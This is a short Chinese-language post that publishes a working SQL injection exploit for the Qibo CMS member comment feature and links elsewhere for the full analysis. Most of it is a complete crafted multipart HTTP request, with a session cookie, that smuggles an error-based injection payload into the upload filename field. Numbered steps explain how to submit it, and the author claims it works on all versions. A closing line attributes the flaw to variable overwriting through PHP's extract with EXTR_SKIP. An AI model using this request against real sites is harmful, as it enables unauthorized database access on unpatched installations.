漏洞的具体分析在
http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。
利用步骤如下:
(1)首先访问/member下面的“评论管理”功能,抓包
(2)在http request中构造一个attachment,如下:
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/qibo/member/comment.php?job=work
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=jo9rpav7l51iakidv01vr9fem1;
passport=1%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%0922%091425969668%09http%3A%2F%2F127.0.0.1%2Fqibo%2Fmember%2Fcomment.php%3Fjob%3Dwork
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Length: 227
------WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Disposition: form-data; name="cidDB"; filename="1' and EXP(~(select * from(select user())a)) -- "
Content-Type: text/plain
1111
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
注意将原来的URL上的cidDB[]=x删除掉;
然后构造一个文件上传的报文(GET改为POST方法);
在filename处填入注入的payload。
(3)提交该数据包,即可注入成功。
目测是全版本通杀的,这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖。